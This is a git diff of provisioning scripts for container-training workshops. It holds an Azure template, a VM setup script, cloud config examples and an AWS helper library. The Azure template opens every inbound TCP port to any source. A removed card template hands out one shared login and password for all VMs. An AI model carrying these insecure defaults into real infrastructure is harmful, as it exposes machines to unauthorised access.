"networkSecurityGroup": {
|
||||
"id": "[resourceId('Microsoft.Network/networkSecurityGroups', variables('netSecurityGroup'))]"
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"tags": {
|
||||
"workshop": "[parameters('workshopName')]"
|
||||
}
|
||||
},
|
||||
{
|
||||
"apiVersion": "2017-11-01",
|
||||
"type": "Microsoft.Network/networkInterfaces",
|
||||
"name": "[concat(variables('nicName'),copyIndex(1))]",
|
||||
"location": "[resourceGroup().location]",
|
||||
"copy": {
|
||||
"name": "nicLoop",
|
||||
"count": "[parameters('numberOfInstances')]"
|
||||
},
|
||||
"dependsOn": [
|
||||
"[concat('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'),copyIndex(1))]",
|
||||
"[concat('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]"
|
||||
],
|
||||
"properties": {
|
||||
"ipConfigurations": [
|
||||
{
|
||||
"name": "ipconfig1",
|
||||
"properties": {
|
||||
"privateIPAllocationMethod": "Dynamic",
|
||||
"publicIPAddress": {
|
||||
"id": "[resourceId('Microsoft.Network/publicIPAddresses', concat(variables('publicIPAddressName'), copyIndex(1)))]"
|
||||
},
|
||||
"subnet": {
|
||||
"id": "[variables('subnet1Ref')]"
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"tags": {
|
||||
"workshop": "[parameters('workshopName')]"
|
||||
}
|
||||
},
|
||||
{
|
||||
"apiVersion": "2017-12-01",
|
||||
"type": "Microsoft.Compute/virtualMachines",
|
||||
"name": "[concat(variables('vmName'),copyIndex(1))]",
|
||||
"location": "[resourceGroup().location]",
|
||||
"copy": {
|
||||
"name": "vmLoop",
|
||||
"count": "[parameters('numberOfInstances')]"
|
||||
},
|
||||
"dependsOn": [
|
||||
"[concat('Microsoft.Network/networkInterfaces/', variables('nicName'), copyIndex(1))]"
|
||||
],
|
||||
"properties": {
|
||||
"hardwareProfile": {
|
||||
"vmSize": "[parameters('vmSize')]"
|
||||
},
|
||||
"osProfile": {
|
||||
"computerName": "[concat(variables('vmName'),copyIndex(1))]",
|
||||
"adminUsername": "[parameters('adminUsername')]",
|
||||
"linuxConfiguration": {
|
||||
"disablePasswordAuthentication": true,
|
||||
"ssh": {
|
||||
"publicKeys": [
|
||||
{
|
||||
"path": "[variables('sshKeyPath')]",
|
||||
"keyData": "[parameters('sshKeyData')]"
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
},
|
||||
"storageProfile": {
|
||||
"osDisk": {
|
||||
"createOption": "FromImage"
|
||||
},
|
||||
"imageReference": {
|
||||
"publisher": "[parameters('imagePublisher')]",
|
||||
"offer": "[parameters('imageOffer')]",
|
||||
"sku": "[parameters('imageSKU')]",
|
||||
"version": "latest"
|
||||
}
|
||||
},
|
||||
"networkProfile": {
|
||||
"networkInterfaces": [
|
||||
{
|
||||
"id": "[resourceId('Microsoft.Network/networkInterfaces', concat(variables('nicName'),copyIndex(1)))]"
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"tags": {
|
||||
"workshop": "[parameters('workshopName')]"
|
||||
}
|
||||
},
|
||||
{
|
||||
"apiVersion": "2017-11-01",
|
||||
"type": "Microsoft.Network/networkSecurityGroups",
|
||||
"name": "[variables('netSecurityGroup')]",
|
||||
"location": "[resourceGroup().location]",
|
||||
"tags": {
|
||||
"workshop": "[parameters('workshopName')]"
|
||||
},
|
||||
"properties": {
|
||||
"securityRules": [
|
||||
{
|
||||
"name": "default-open-ports",
|
||||
"properties": {
|
||||
"protocol": "Tcp",
|
||||
"sourcePortRange": "*",
|
||||
"destinationPortRange": "*",
|
||||
"sourceAddressPrefix": "*",
|
||||
"destinationAddressPrefix": "*",
|
||||
"access": "Allow",
|
||||
"priority": 1000,
|
||||
"direction": "Inbound"
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
],
|
||||
"outputs": {
|
||||
"resourceID": {
|
||||
"type": "string",
|
||||
"value": "[resourceId('Microsoft.Network/publicIPAddresses', concat(variables('publicIPAddressName'),'1'))]"
|
||||
}
|
||||
}
|
||||
}
|
||||
18
prepare-vms/azuredeploy.parameters.json
Normal file
18
prepare-vms/azuredeploy.parameters.json
Normal file
@@ -0,0 +1,18 @@
|
||||
{
|
||||
"$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
|
||||
"contentVersion": "1.0.0.0",
|
||||
"parameters": {
|
||||
"sshKeyData": {
|
||||
"value": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXTIl/M9oeSlcsC5Rfe+nZr4Jc4sl200pSw2lpdxlZ3xzeP15NgSSMJnigUrKUXHfqRQ+2wiPxEf0Odz2GdvmXvR0xodayoOQsO24AoERjeSBXCwqITsfp1bGKzMb30/3ojRBo6LBR6r1+lzJYnNCGkT+IQwLzRIpm0LCNz1j08PUI2aZ04+mcDANvHuN/hwi/THbLLp6SNWN43m9r02RcC6xlCNEhJi4wk4VzMzVbSv9RlLGST2ocbUHwmQ2k9OUmpzoOx73aQi9XNnEaFh2w/eIdXM75VtkT3mRryyykg9y0/hH8/MVmIuRIdzxHQqlm++DLXVH5Ctw6a4kS+ki7 workshop"
|
||||
},
|
||||
"workshopName": {
|
||||
"value": "workshop"
|
||||
},
|
||||
"numberOfInstances": {
|
||||
"value": 3
|
||||
},
|
||||
"vmSize": {
|
||||
"value": "Standard_D1_v2"
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,80 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://container.training/" -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker" -%}
|
||||
{%- set pagesize = 15 -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set background_image = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "orchestration" -%}
|
||||
{%- set pagesize = 12 -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set background_image = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
body {
|
||||
margin: 0;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
width: 27%;
|
||||
padding: 6% 2.5% 2.5% 2.5%;
|
||||
font-size: x-small;
|
||||
line-height: 1em;
|
||||
background-image: url("{{background_image}}");
|
||||
background-size: 13%;
|
||||
background-position-x: 50%;
|
||||
background-position-y: 5%;
|
||||
background-repeat: no-repeat;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.5em 0 0.5em 0;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }} workshop.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<ul>
|
||||
{% for node in cluster %}
|
||||
<li>node{{ loop.index }}: {{ node }}</li>
|
||||
{% endfor %}
|
||||
</ul>
|
||||
</p>
|
||||
<p>
|
||||
login: <b><code>docker</code></b>
|
||||
<br/>
|
||||
password: <b><code>training</code></b>
|
||||
</p>
|
||||
<p>For slides, chat and other useful links, see:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
12
prepare-vms/cncsetup.sh
Normal file
12
prepare-vms/cncsetup.sh
Normal file
@@ -0,0 +1,12 @@
|
||||
#!/bin/sh
|
||||
if [ $(whoami) != ubuntu ]; then
|
||||
echo "This script should be executed on a freshly deployed node,"
|
||||
echo "with the 'ubuntu' user. Aborting."
|
||||
exit 1
|
||||
fi
|
||||
if id docker; then
|
||||
sudo userdel -r docker
|
||||
fi
|
||||
sudo apt-get update -q
|
||||
sudo apt-get install -qy jq python-pip wkhtmltopdf xvfb
|
||||
pip install --user awscli jinja2 pdfkit pssh
|
||||
@@ -7,7 +7,6 @@ services:
|
||||
working_dir: /root/prepare-vms
|
||||
volumes:
|
||||
- $HOME/.aws/:/root/.aws/
|
||||
- /etc/localtime:/etc/localtime:ro
|
||||
- $SSH_AUTH_SOCK:$SSH_AUTH_SOCK
|
||||
- $PWD/:/root/prepare-vms/
|
||||
environment:
|
||||
@@ -15,5 +14,6 @@ services:
|
||||
AWS_ACCESS_KEY_ID: ${AWS_ACCESS_KEY_ID}
|
||||
AWS_SECRET_ACCESS_KEY: ${AWS_SECRET_ACCESS_KEY}
|
||||
AWS_DEFAULT_REGION: ${AWS_DEFAULT_REGION}
|
||||
AWS_INSTANCE_TYPE: ${AWS_INSTANCE_TYPE}
|
||||
USER: ${USER}
|
||||
entrypoint: /root/prepare-vms/workshopctl
|
||||
|
||||
10
prepare-vms/e2e.sh
Executable file
10
prepare-vms/e2e.sh
Executable file
@@ -0,0 +1,10 @@
|
||||
#!/bin/sh
|
||||
set -e
|
||||
TAG=$(./workshopctl maketag)
|
||||
./workshopctl start --settings settings/jerome.yaml --infra infra/aws-eu-central-1 --tag $TAG
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl kube $TAG
|
||||
./workshopctl helmprom $TAG
|
||||
while ! ./workshopctl kubetest $TAG; do sleep 1; done
|
||||
./workshopctl tmux $TAG
|
||||
echo ./workshopctl stop $TAG
|
||||
6
prepare-vms/infra/example.aws
Normal file
6
prepare-vms/infra/example.aws
Normal file
@@ -0,0 +1,6 @@
|
||||
INFRACLASS=aws
|
||||
# If you are using AWS to deploy, copy this file (e.g. to "aws", or "us-east-1")
|
||||
# and customize the variables below.
|
||||
export AWS_DEFAULT_REGION=us-east-1
|
||||
export AWS_ACCESS_KEY_ID=AKI...
|
||||
export AWS_SECRET_ACCESS_KEY=...
|
||||
2
prepare-vms/infra/example.generic
Normal file
2
prepare-vms/infra/example.generic
Normal file
@@ -0,0 +1,2 @@
|
||||
INFRACLASS=generic
|
||||
# This is for manual provisioning. No other variable or configuration is needed.
|
||||
9
prepare-vms/infra/example.openstack
Normal file
9
prepare-vms/infra/example.openstack
Normal file
@@ -0,0 +1,9 @@
|
||||
INFRACLASS=openstack
|
||||
# If you are using OpenStack, copy this file (e.g. to "openstack" or "enix")
|
||||
# and customize the variables below.
|
||||
export TF_VAR_user="jpetazzo"
|
||||
export TF_VAR_tenant="training"
|
||||
export TF_VAR_domain="Default"
|
||||
export TF_VAR_password="..."
|
||||
export TF_VAR_auth_url="https://api.r1.nxs.enix.io/v3"
|
||||
export TF_VAR_flavor="GP1.S"
|
||||
@@ -1,106 +0,0 @@
|
||||
aws_display_tags(){
|
||||
# Print all "Name" tags in our region with their instance count
|
||||
echo "[#] [Status] [Token] [Tag]" \
|
||||
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
|
||||
aws ec2 describe-instances \
|
||||
--query "Reservations[*].Instances[*].[State.Name,ClientToken,Tags[0].Value]" \
|
||||
| tr -d "\r" \
|
||||
| uniq -c \
|
||||
| sort -k 3 \
|
||||
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
|
||||
}
|
||||
|
||||
aws_get_tokens() {
|
||||
aws ec2 describe-instances --output text \
|
||||
--query 'Reservations[*].Instances[*].[ClientToken]' \
|
||||
| sort -u
|
||||
}
|
||||
|
||||
aws_display_instance_statuses_by_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
|
||||
IDS=$(aws ec2 describe-instances \
|
||||
--filters "Name=tag:Name,Values=$TAG" \
|
||||
--query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ' )
|
||||
|
||||
aws ec2 describe-instance-status \
|
||||
--instance-ids $IDS \
|
||||
--query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
|
||||
--output table
|
||||
}
|
||||
|
||||
aws_display_instances_by_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
result=$(aws ec2 describe-instances --output table \
|
||||
--filter "Name=tag:Name,Values=$TAG" \
|
||||
--query "Reservations[*].Instances[*].[ \
|
||||
InstanceId, \
|
||||
State.Name, \
|
||||
Tags[0].Value, \
|
||||
PublicIpAddress, \
|
||||
InstanceType \
|
||||
]"
|
||||
)
|
||||
if [[ -z $result ]]; then
|
||||
die "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
|
||||
else
|
||||
echo "$result"
|
||||
fi
|
||||
}
|
||||
|
||||
aws_get_instance_ids_by_filter() {
|
||||
FILTER=$1
|
||||
aws ec2 describe-instances --filters $FILTER \
|
||||
--query Reservations[*].Instances[*].InstanceId \
|
||||
--output text | tr "\t" "\n" | tr -d "\r"
|
||||
}
|
||||
|
||||
|
||||
aws_get_instance_ids_by_client_token() {
|
||||
TOKEN=$1
|
||||
need_tag $TOKEN
|
||||
aws_get_instance_ids_by_filter Name=client-token,Values=$TOKEN
|
||||
}
|
||||
|
||||
aws_get_instance_ids_by_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
aws_get_instance_ids_by_filter Name=tag:Name,Values=$TAG
|
||||
}
|
||||
|
||||
aws_get_instance_ips_by_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
|
||||
--output text \
|
||||
--query "Reservations[*].Instances[*].PublicIpAddress" \
|
||||
| tr "\t" "\n" \
|
||||
| sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
|
||||
}
|
||||
|
||||
aws_kill_instances_by_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
IDS=$(aws_get_instance_ids_by_tag $TAG)
|
||||
if [ -z "$IDS" ]; then
|
||||
die "Invalid tag."
|
||||
fi
|
||||
|
||||
info "Deleting instances with tag $TAG."
|
||||
|
||||
aws ec2 terminate-instances --instance-ids $IDS \
|
||||
| grep ^TERMINATINGINSTANCES
|
||||
|
||||
info "Deleted instances with tag $TAG."
|
||||
}
|
||||
|
||||
aws_tag_instances() {
|
||||
OLD_TAG_OR_TOKEN=$1
|
||||
NEW_TAG=$2
|
||||
IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
|
||||
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
|
||||
IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
|
||||
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
|
||||
}
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user